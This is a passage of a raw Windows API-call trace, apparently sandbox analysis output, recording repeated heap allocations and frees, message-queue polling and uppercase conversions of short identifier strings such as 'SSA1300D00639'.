lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0252.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0252.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0252.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.550] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.551] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0252.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.551] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.551] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.552] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.552] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0252.553] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.553] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.553] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0252.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.553] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.554] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.554] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.554] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.556] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.556] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0252.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0252.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0252.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0252.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0252.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0252.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.558] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.558] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0252.559] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0252.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0252.559] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0252.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0252.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0252.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0252.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0252.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0252.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0252.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0252.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0252.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0252.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0252.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0252.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0252.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0252.562] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.563] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0252.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.565] RtlAllocateHeap 